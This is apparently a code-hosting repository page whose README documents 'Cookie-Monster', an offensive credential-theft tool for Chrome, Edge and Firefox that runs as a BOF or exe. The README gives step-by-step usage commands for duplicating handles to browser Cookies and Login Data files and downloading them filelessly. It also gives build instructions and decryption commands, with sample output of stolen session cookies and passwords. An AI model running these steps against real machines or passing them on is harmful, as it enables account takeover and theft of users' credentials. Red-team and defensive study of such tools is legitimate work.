# cookie-monster **Repository Path**: secrole/cookie-monster ## Basic Information - **Project Name**: cookie-monster - **Description**: No description available - **Primary Language**: Unknown - **License**: GPL-3.0 - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2024-04-26 - **Last Updated**: 2024-04-26 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # Cookie-Monster Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption. ## BOF Usage ``` Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID || --chromeLoginDataPID || --edgeCookiePID || --edgeLoginDataPID ] cookie-monster Example: cookie-monster --chrome cookie-monster --edge cookie-moster --firefox cookie-monster --chromeCookiePID 1337 cookie-monster --chromeLoginDataPID 1337 cookie-monster --edgeCookiePID 4444 cookie-monster --edgeLoginDataPID 4444 cookie-monster Options: --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD --firefox, looks for profiles.ini and locates the key4.db and logins.json file --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file ``` ## EXE usage ``` Cookie Monster Example: cookie-monster.exe --all Cookie Monster Options: -h, --help Show this help message and exit --all Run chrome, edge, and firefox methods --edge Extract edge keys and download Cookies/Login Data file to PWD --chrome Extract chrome keys and download Cookies/Login Data file to PWD --firefox Locate firefox key and Cookies, does not make a copy of either file ``` ## Decryption Steps Install requirements ``` pip3 install -r requirements.txt ``` Base64 encode the webkit masterkey ``` python3 base64-encode.py "\xec\xfc...." ``` Decrypt Chrome/Edge Cookies File ``` python .\decrypt.py "XHh..." --cookies ChromeCookie.db Results Example: ----------------------------------- Host: .github.com Path: / Name: dotcom_user Cookie: KingOfTheNOPs Expires: Oct 28 2024 21:25:22 Host: github.com Path: / Name: user_session Cookie: x123..... Expires: Nov 11 2023 21:25:22 ``` Decrypt Chome/Edge Passwords File ``` python .\decrypt.py "XHh..." --passwords ChromePasswords.db Results Example: ----------------------------------- URL: https://test.com/ Username: tester Password: McTesty ``` Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd ## Installation Ensure Mingw-w64 and make is installed on the linux prior to compiling. ``` make ``` to compile exe on windows ``` gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32 ``` ### TO-DO - update decrypt.py to support firefox based on [firepwd](https://github.com/lclevy/firepwd) and add bruteforce module based on [DonPAPI](https://github.com/login-securite/DonPAPI) ## References This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI